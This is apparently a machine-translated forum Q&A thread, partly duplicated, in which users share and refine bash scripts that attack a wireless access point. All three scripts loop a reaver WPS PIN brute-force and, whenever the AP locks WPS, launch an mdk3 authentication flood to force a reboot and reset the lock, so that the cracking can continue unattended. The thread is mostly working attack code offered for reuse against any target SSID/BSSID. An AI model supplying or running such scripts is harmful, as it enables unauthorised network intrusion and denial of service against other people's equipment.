Bash reaver 解锁 wps 锁定状态的脚本
Bash script for reaver to unlock wps-locked status
首先,对不起我糟糕的英语。我正在尝试编写一个 bash 脚本,以便使用 reaver 执行 AP WPS 破解。问题是,在尝试了一些 WPS-PIN 后,AP 锁定了 WPS,所以我的 reaver 没有用。
为了解决这个问题,我进行了mdk3攻击,强制AP重启并能够再次攻击它(重启后,WPS以解锁状态重启)。
这种方法的问题在于:
- AP锁定时我必须在PC锁定前
- 进行mdk3攻击,AP重启时停止,再次进行reaver攻击。解决这个问题显然是一个脚本。
我写了下面几行应该可以解决这个问题。
我不得不说我在 bash 脚本方面是个菜鸟,所以脚本不是 "professional",它只是 "workarround" 来解决我的问题。
#!/bin/bash
while true; do
# Switch to the correct channel and save it into $channel
echo Detecting AP channel
timeout 25 reaver -i wlan0mon -e AP_SSID -b AP_BSSID -q # Switch to the AP channel
rm ap_channel 2> /dev/null
touch ap_channel
timeout 5 aireplay-ng -1 0 -e AP_SSID -a AP_BSSID -h MY_MAC wlan0mon > ap_channel
channel="$(head -1 ap_channel | tail -c 2 | head -c 1)"
rm ap_channel
# Attacks the AP while it isn't wps-locked
rm ap_status 2> /dev/null
timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status
while [ -z "$(grep Locked ap_status)" ]; do
echo Performing reaver attack
aireplay-ng -1 0 -e AP_SSID -a AP_BSSID -h MY_MAC wlan0mon
timeout 30 reaver -i wlan0mon -e AP_SSID -b AP_BSSID --no-nacks -vv -s REAVER_PREV_SESSION.wpc -w -A -g 1 -C gnome-screenshot -f
rm ap_status
timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status
done
# The AP is now locked. Performs a mdk3 attack (in order to reboot the AP) while the AP wps-status is Locked
((mdk3 wlan0mon a -a AP_BSSID -m) 2>&1) > /dev/null &
mdk3_pid=$!
rm ap_status
timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status
while [ -n "$(grep Locked ap_status)" ]; do
echo Trying to reboot the AP
rm ap_status
timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status
done
# The AP is now rebooted. Kill the mdk3 process and wait 2 mins to restart reaver attack
kill -9 $mdk3_pid
echo AP rebooted. Waiting 2 mins till AP init
sleep 120
done
此脚本中的问题是我用于 airodump 输出的 stdout 重定向 运行 如果我直接在命令行中执行它与我在脚本中执行它不同。
timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status
我需要一种方法来在脚本中执行上面的行,就好像我直接在 tty 中执行它一样。我无法使用 exec 执行此操作,因为我需要继续执行脚本。
注意:我不能为 airodump-ng 使用 -w 选项,因为它不会保存 WPS 状态。
有人可以帮我解决这个问题吗?
我终于明白了。我找到了解决此问题的解决方法,将命令的标准输出重定向到文件。我post脚本,也许有人会用。
!/bin/bash
while true; do
rm attack
rm ap_status
rm ap_channel
# Detects the AP channel
echo Detecting AP channel
timeout 45 reaver -i wlan0mon -e AP_SSID -b AP_BSSID -vv > ap_channel # Switch to the AP channel
timeout 15 aireplay-ng -1 0 -e AP_SSID -a AP_BSSID -h MY_MAC wlan0mon > ap_channel
channel="$(head -1 ap_channel | tail -c 3 | head -c 2)"
rm ap_channel
echo Detected AP channel $channel
# Attacks the AP using reaver till the AP locks the WPS
((airodump-ng wlan0mon --wps --essid AP_SSID -c $channel) 2>&1) > ap_status &
airodump_pid=$!
sleep 10
kill -9 $airodump_pid
while [ -z "$(grep Locked ap_status)" ]; do
echo Performing reaver attack
aireplay-ng -1 0 -e AP_SSID -a AP_BSSID -h MY_MAC wlan0mon
timeout 30 reaver -i wlan0mon -e AP_SSID -b AP_BSSID --no-nacks -vv -s PREV_SESSION.wpc -w -A -g 1 -C gnome-screenshot -f
((airodump-ng wlan0mon --wps --essid AP_SSID -c $channel) 2>&1) > ap_status &
airodump_pid=$!
sleep 10
kill -9 $airodump_pid
done
# Force a reboot in the AP to unlock WPS
((mdk3 wlan0mon a -a AP_BSSID -m) 2>&1) > attack &
mdk3_pid=$!
((airodump-ng wlan0mon --wps --essid AP_SSID -c $channel) 2>&1) > ap_status &
airodump_pid=$!
sleep 10
kill -9 $airodump_pid
while [ -n "$(grep Locked ap_status -m 1)" ]; do
echo Trying to reboot the AP
((airodump-ng wlan0mon --wps --essid AP_SSID -c $channel) 2>&1) > ap_status &
airodump_pid=$!
sleep 10
kill -9 $airodump_pid
done
# The AP is now rebooted. Kill the mdk3 process and wait 2 mins to restart reaver attack
kill -9 $mdk3_pid
echo AP rebooted. Waiting 5 mins till AP init
rm attack
rm ap_status
sleep 300
done
延迟设置为长,但还可以。这取决于AP,你可以改变它们。
为了使用脚本,需要aircrack、reaver(最新版本,有--wps选项的版本)、timeout和mdk3包。
如果知道 bash 脚本的人想修改脚本并上传更好的脚本,那就太好了!
我的变体。
固定延迟替换 dynamic wait。
计算尝试 pin 和等待时间。
将“-C gnome-screenshot -f”替换为您的屏幕截图程序或将其删除。
!/bin/bash
while true; do
rm attack 2> null
rm ap_status 2> null
rm ap_channel 2> null
rm assoc 2> null
AP_SSID="TARGET_ESSID"
AP_BSSID="TARGET_BSSID"
MY_MAC="YOU_MAC"
MON_INTERFACE=wlan0mon
PREV_SESS_FILE="PREV_SESSION_FILE.wpc"
countTryPin=0
countFile=totalTryPinCount # count file to store total try pin
waitTryReboot=0 # count wait time AP rebooting (DDOS MDK3)
waitReboot=0 # count wait time AP recovery after rebooting
touch $countFile
echo -e -n "\n\nDetect channel"
touch assoc
((reaver -i $MON_INTERFACE -e $AP_SSID -b $AP_BSSID -A -s $PREV_SESS_FILE) 2>&1) > assoc &
assoc_pid=$!
while [ -z "$(grep Associated assoc)" ]; do
sleep 3
echo -n .
done
echo -e "\n\n"
kill -9 $assoc_pid
wait $assoc_pid 2> null
rm assoc
echo -n "Wait association"
((aireplay-ng -1 0 -e $AP_SSID -a $AP_BSSID -h $MY_MAC $MON_INTERFACE) 2>&1) > ap_channel &
ap_channel_pid=$!
while [ -z "$(grep successful ap_channel)" ]; do
sleep 1
echo -n "."
done
channel="$(head -1 ap_channel | tail -c 3 | head -c 2)"
echo -e "\n\Channel set to $channel\n\n"
rm ap_channel
touch ap_status
echo -n -e "\nCheck AP WPS lock"
while [ -z "$(grep $AP_SSID ap_status)" ]; do
((airodump-ng $MON_INTERFACE --wps --essid $AP_SSID -c $channel) 2>&1) > ap_status &
airodump_pid=$!
echo -n .
sleep 1
kill -9 $airodump_pid
wait $airodump_pid 2> null
done
echo -e "\n\n"
((airodump-ng $MON_INTERFACE --wps --essid $AP_SSID -c $channel) 2>&1) > ap_status &
airodump_pid=$!
while [ -z "$(grep $AP_SSID ap_status -m 1)" ]; do
sleep 2
done
kill -9 $airodump_pid
wait $airodump_pid 2> null
while [ -z "$(grep Locked ap_status -m 1)" ]; do
((airodump-ng $MON_INTERFACE --wps --essid $AP_SSID -c $channel) 2>&1) > ap_status &
airodump_pid=$!
echo -e "\n\nBegig reaver attack\n\n"
echo -n "Wait association"
((aireplay-ng -1 0 -e $AP_SSID -a $AP_BSSID -h $MY_MAC $MON_INTERFACE) 2>&1) > ap_channel &
ap_channel_pid=$!
while [ -z "$(grep successful ap_channel)" ]; do
sleep 1
echo -n "."
done
echo -e "\n\n"
timeout 10 reaver -i $MON_INTERFACE -e $AP_SSID -b $AP_BSSID --no-nacks -vv -s $PREV_SESS_FILE -w -A -g 1 -C gnome-screenshot -f # remove or replace "-C gnome-screenshot -f" to you screenshot programm
countTryPin=$[countTryPin + 1]
kill -9 $airodump_pid
wait $airodump_pid 2> null
done
# Force a reboot in the AP to unlock WPS
((mdk3 $MON_INTERFACE a -a $AP_BSSID) 2>&1) > attack &
mdk3_pid=$!
echo -e "\n\n"
while [ -n "$(grep Locked ap_status -m 1)" ] && [ -n "$(grep $AP_SSID ap_status -m 1)" ]; do
((airodump-ng $MON_INTERFACE --wps --essid $AP_SSID -c $channel) 2>&1) > ap_status &
airodump_pid=$!
sleep 4
waitTryReboot=$[waitTryReboot + 4]
echo -e -n "\rTry calling reboot AP. Wait $waitTryReboot sec."
kill -9 $airodump_pid
wait $airodump_pid 2> null
done
# The AP is now rebooted. Kill the mdk3 process and wait 2 mins to restart reaver attack
kill -9 $mdk3_pid
wait $mdk3_pid 2> null
totalTryPin=`cat $countFile`
totalTryPin=$(($totalTryPin + $countTryPin))
echo $totalTryPin > $countFile
echo -e "\n\n"
while [ -z "$(grep $AP_SSID ap_status)" ]; do
# After reboot AP may be change channel. Run without channel
((airodump-ng $MON_INTERFACE --wps --essid $AP_SSID) 2>&1) > ap_status &
airodump_pid=$!
sleep 5
waitReboot=$[waitReboot + 5]
echo -e -n "\rAP rebooting. Wait $waitReboot sec."
kill -9 $airodump_pid
wait $airodump_pid 2> null
done
rm attack
rm ap_status
rm null
execTime=$(($SECONDS+$waitTryReboot+$waitReboot))
echo -e "\n\nDone $countTryPin try pin.\
\nCalling reboot AP wait time $waitTryReboot sec.\
\nAP rebooting wait time $waitReboot sec.\
\nTotal execute time $SECONDS sec.\
\nTotal try pin $totalTryPin\n\n"
sleep 3
SECONDS=0
done
首先,对不起我糟糕的英语。我正在尝试编写一个 bash 脚本,以便使用 reaver 执行 AP WPS 破解。问题是,在尝试了一些 WPS-PIN 后,AP 锁定了 WPS,所以我的 reaver 没有用。
为了解决这个问题,我进行了mdk3攻击,强制AP重启并能够再次攻击它(重启后,WPS以解锁状态重启)。
这种方法的问题在于:
- AP锁定时我必须在PC锁定前
- 进行mdk3攻击,AP重启时停止,再次进行reaver攻击。解决这个问题显然是一个脚本。
我写了下面几行应该可以解决这个问题。
我不得不说我在 bash 脚本方面是个菜鸟,所以脚本不是 "professional",它只是 "workarround" 来解决我的问题。
#!/bin/bash
while true; do
# Switch to the correct channel and save it into $channel
echo Detecting AP channel
timeout 25 reaver -i wlan0mon -e AP_SSID -b AP_BSSID -q # Switch to the AP channel
rm ap_channel 2> /dev/null
touch ap_channel
timeout 5 aireplay-ng -1 0 -e AP_SSID -a AP_BSSID -h MY_MAC wlan0mon > ap_channel
channel="$(head -1 ap_channel | tail -c 2 | head -c 1)"
rm ap_channel
# Attacks the AP while it isn't wps-locked
rm ap_status 2> /dev/null
timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status
while [ -z "$(grep Locked ap_status)" ]; do
echo Performing reaver attack
aireplay-ng -1 0 -e AP_SSID -a AP_BSSID -h MY_MAC wlan0mon
timeout 30 reaver -i wlan0mon -e AP_SSID -b AP_BSSID --no-nacks -vv -s REAVER_PREV_SESSION.wpc -w -A -g 1 -C gnome-screenshot -f
rm ap_status
timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status
done
# The AP is now locked. Performs a mdk3 attack (in order to reboot the AP) while the AP wps-status is Locked
((mdk3 wlan0mon a -a AP_BSSID -m) 2>&1) > /dev/null &
mdk3_pid=$!
rm ap_status
timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status
while [ -n "$(grep Locked ap_status)" ]; do
echo Trying to reboot the AP
rm ap_status
timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status
done
# The AP is now rebooted. Kill the mdk3 process and wait 2 mins to restart reaver attack
kill -9 $mdk3_pid
echo AP rebooted. Waiting 2 mins till AP init
sleep 120
done
此脚本中的问题是我用于 airodump 输出的 stdout 重定向 运行 如果我直接在命令行中执行它与我在脚本中执行它不同。
timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status
我需要一种方法来在脚本中执行上面的行,就好像我直接在 tty 中执行它一样。我无法使用 exec 执行此操作,因为我需要继续执行脚本。
注意:我不能为 airodump-ng 使用 -w 选项,因为它不会保存 WPS 状态。
有人可以帮我解决这个问题吗?
我终于明白了。我找到了解决此问题的解决方法,将命令的标准输出重定向到文件。我post脚本,也许有人会用。
!/bin/bash
while true; do
rm attack
rm ap_status
rm ap_channel
# Detects the AP channel
echo Detecting AP channel
timeout 45 reaver -i wlan0mon -e AP_SSID -b AP_BSSID -vv > ap_channel # Switch to the AP channel
timeout 15 aireplay-ng -1 0 -e AP_SSID -a AP_BSSID -h MY_MAC wlan0mon > ap_channel
channel="$(head -1 ap_channel | tail -c 3 | head -c 2)"
rm ap_channel
echo Detected AP channel $channel
# Attacks the AP using reaver till the AP locks the WPS
((airodump-ng wlan0mon --wps --essid AP_SSID -c $channel) 2>&1) > ap_status &
airodump_pid=$!
sleep 10
kill -9 $airodump_pid
while [ -z "$(grep Locked ap_status)" ]; do
echo Performing reaver attack
aireplay-ng -1 0 -e AP_SSID -a AP_BSSID -h MY_MAC wlan0mon
timeout 30 reaver -i wlan0mon -e AP_SSID -b AP_BSSID --no-nacks -vv -s PREV_SESSION.wpc -w -A -g 1 -C gnome-screenshot -f
((airodump-ng wlan0mon --wps --essid AP_SSID -c $channel) 2>&1) > ap_status &
airodump_pid=$!
sleep 10
kill -9 $airodump_pid
done
# Force a reboot in the AP to unlock WPS
((mdk3 wlan0mon a -a AP_BSSID -m) 2>&1) > attack &
mdk3_pid=$!
((airodump-ng wlan0mon --wps --essid AP_SSID -c $channel) 2>&1) > ap_status &
airodump_pid=$!
sleep 10
kill -9 $airodump_pid
while [ -n "$(grep Locked ap_status -m 1)" ]; do
echo Trying to reboot the AP
((airodump-ng wlan0mon --wps --essid AP_SSID -c $channel) 2>&1) > ap_status &
airodump_pid=$!
sleep 10
kill -9 $airodump_pid
done
# The AP is now rebooted. Kill the mdk3 process and wait 2 mins to restart reaver attack
kill -9 $mdk3_pid
echo AP rebooted. Waiting 5 mins till AP init
rm attack
rm ap_status
sleep 300
done
延迟设置为长,但还可以。这取决于AP,你可以改变它们。
为了使用脚本,需要aircrack、reaver(最新版本,有--wps选项的版本)、timeout和mdk3包。
如果知道 bash 脚本的人想修改脚本并上传更好的脚本,那就太好了!
我的变体。
固定延迟替换 dynamic wait。
计算尝试 pin 和等待时间。
将“-C gnome-screenshot -f”替换为您的屏幕截图程序或将其删除。
!/bin/bash
while true; do
rm attack 2> null
rm ap_status 2> null
rm ap_channel 2> null
rm assoc 2> null
AP_SSID="TARGET_ESSID"
AP_BSSID="TARGET_BSSID"
MY_MAC="YOU_MAC"
MON_INTERFACE=wlan0mon
PREV_SESS_FILE="PREV_SESSION_FILE.wpc"
countTryPin=0
countFile=totalTryPinCount # count file to store total try pin
waitTryReboot=0 # count wait time AP rebooting (DDOS MDK3)
waitReboot=0 # count wait time AP recovery after rebooting
touch $countFile
echo -e -n "\n\nDetect channel"
touch assoc
((reaver -i $MON_INTERFACE -e $AP_SSID -b $AP_BSSID -A -s $PREV_SESS_FILE) 2>&1) > assoc &
assoc_pid=$!
while [ -z "$(grep Associated assoc)" ]; do
sleep 3
echo -n .
done
echo -e "\n\n"
kill -9 $assoc_pid
wait $assoc_pid 2> null
rm assoc
echo -n "Wait association"
((aireplay-ng -1 0 -e $AP_SSID -a $AP_BSSID -h $MY_MAC $MON_INTERFACE) 2>&1) > ap_channel &
ap_channel_pid=$!
while [ -z "$(grep successful ap_channel)" ]; do
sleep 1
echo -n "."
done
channel="$(head -1 ap_channel | tail -c 3 | head -c 2)"
echo -e "\n\Channel set to $channel\n\n"
rm ap_channel
touch ap_status
echo -n -e "\nCheck AP WPS lock"
while [ -z "$(grep $AP_SSID ap_status)" ]; do
((airodump-ng $MON_INTERFACE --wps --essid $AP_SSID -c $channel) 2>&1) > ap_status &
airodump_pid=$!
echo -n .
sleep 1
kill -9 $airodump_pid
wait $airodump_pid 2> null
done
echo -e "\n\n"
((airodump-ng $MON_INTERFACE --wps --essid $AP_SSID -c $channel) 2>&1) > ap_status &
airodump_pid=$!
while [ -z "$(grep $AP_SSID ap_status -m 1)" ]; do
sleep 2
done
kill -9 $airodump_pid
wait $airodump_pid 2> null
while [ -z "$(grep Locked ap_status -m 1)" ]; do
((airodump-ng $MON_INTERFACE --wps --essid $AP_SSID -c $channel) 2>&1) > ap_status &
airodump_pid=$!
echo -e "\n\nBegig reaver attack\n\n"
echo -n "Wait association"
((aireplay-ng -1 0 -e $AP_SSID -a $AP_BSSID -h $MY_MAC $MON_INTERFACE) 2>&1) > ap_channel &
ap_channel_pid=$!
while [ -z "$(grep successful ap_channel)" ]; do
sleep 1
echo -n "."
done
echo -e "\n\n"
timeout 10 reaver -i $MON_INTERFACE -e $AP_SSID -b $AP_BSSID --no-nacks -vv -s $PREV_SESS_FILE -w -A -g 1 -C gnome-screenshot -f # remove or replace "-C gnome-screenshot -f" to you screenshot programm
countTryPin=$[countTryPin + 1]
kill -9 $airodump_pid
wait $airodump_pid 2> null
done
# Force a reboot in the AP to unlock WPS
((mdk3 $MON_INTERFACE a -a $AP_BSSID) 2>&1) > attack &
mdk3_pid=$!
echo -e "\n\n"
while [ -n "$(grep Locked ap_status -m 1)" ] && [ -n "$(grep $AP_SSID ap_status -m 1)" ]; do
((airodump-ng $MON_INTERFACE --wps --essid $AP_SSID -c $channel) 2>&1) > ap_status &
airodump_pid=$!
sleep 4
waitTryReboot=$[waitTryReboot + 4]
echo -e -n "\rTry calling reboot AP. Wait $waitTryReboot sec."
kill -9 $airodump_pid
wait $airodump_pid 2> null
done
# The AP is now rebooted. Kill the mdk3 process and wait 2 mins to restart reaver attack
kill -9 $mdk3_pid
wait $mdk3_pid 2> null
totalTryPin=`cat $countFile`
totalTryPin=$(($totalTryPin + $countTryPin))
echo $totalTryPin > $countFile
echo -e "\n\n"
while [ -z "$(grep $AP_SSID ap_status)" ]; do
# After reboot AP may be change channel. Run without channel
((airodump-ng $MON_INTERFACE --wps --essid $AP_SSID) 2>&1) > ap_status &
airodump_pid=$!
sleep 5
waitReboot=$[waitReboot + 5]
echo -e -n "\rAP rebooting. Wait $waitReboot sec."
kill -9 $airodump_pid
wait $airodump_pid 2> null
done
rm attack
rm ap_status
rm null
execTime=$(($SECONDS+$waitTryReboot+$waitReboot))
echo -e "\n\nDone $countTryPin try pin.\
\nCalling reboot AP wait time $waitTryReboot sec.\
\nAP rebooting wait time $waitReboot sec.\
\nTotal execute time $SECONDS sec.\
\nTotal try pin $totalTryPin\n\n"
sleep 3
SECONDS=0
done